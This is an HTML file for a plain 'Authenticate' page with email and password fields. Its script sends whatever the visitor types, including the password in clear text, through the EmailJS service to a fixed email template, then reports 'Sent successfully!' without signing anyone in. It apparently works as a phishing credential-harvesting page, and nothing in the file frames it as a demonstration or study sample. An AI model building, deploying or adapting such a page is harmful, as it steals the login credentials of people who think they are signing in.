<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Authentication Form</title>
  <style>
    body {
      background-color: #f5f7fa;
      font-family: Arial, sans-serif;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
      margin: 0;
    }
    .form-container {
      background: white;
      padding: 2rem 3rem;
      border-radius: 8px;
      box-shadow: 0 4px 10px rgba(0,0,0,0.1);
      width: 100%;
      max-width: 400px;
    }
    h2 {
      margin-bottom: 1.5rem;
      color: #333;
    }
    input[type="email"], input[type="password"] {
      width: 100%;
      padding: 0.75rem;
      margin-bottom: 1rem;
      border: 1px solid #ccc;
      border-radius: 4px;
    }
    button {
      width: 100%;
      padding: 0.75rem;
      background-color: #0070f3;
      color: white;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      font-weight: bold;
    }
    button:hover {
      background-color: #005bb5;
    }
    .success, .error {
      margin-top: 1rem;
      text-align: center;
      font-size: 0.9rem;
    }
    .success { color: green; }
    .error { color: red; }
  </style>
</head>
<body>
  <div class="form-container">
    <h2>Authenticate</h2>
    <form id="auth-form">
      <input type="email" id="email" placeholder="Email" required />
      <input type="password" id="password" placeholder="Password" required />
      <button type="submit">Send</button>
    </form>
    <div class="success" id="success-message" style="display:none;">Sent successfully!</div>
    <div class="error" id="error-message" style="display:none;">Something went wrong.</div>
  </div>

  <script src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
  <script>
    (function(){
      emailjs.init("fifhgEMmRCJPwKn1p");
    })();

    document.getElementById("auth-form").addEventListener("submit", function(e) {
      e.preventDefault();

      emailjs.send("service_ilmow3e", "template_hlma28s", {
        user_email: document.getElementById("email").value,
        user_password: document.getElementById("password").value
      }).then(function(response) {
        document.getElementById("success-message").style.display = "block";
        document.getElementById("error-message").style.display = "none";
      }, function(error) {
        document.getElementById("error-message").style.display = "block";
        document.getElementById("success-message").style.display = "none";
      });
    });
  </script>
</body>
</html>
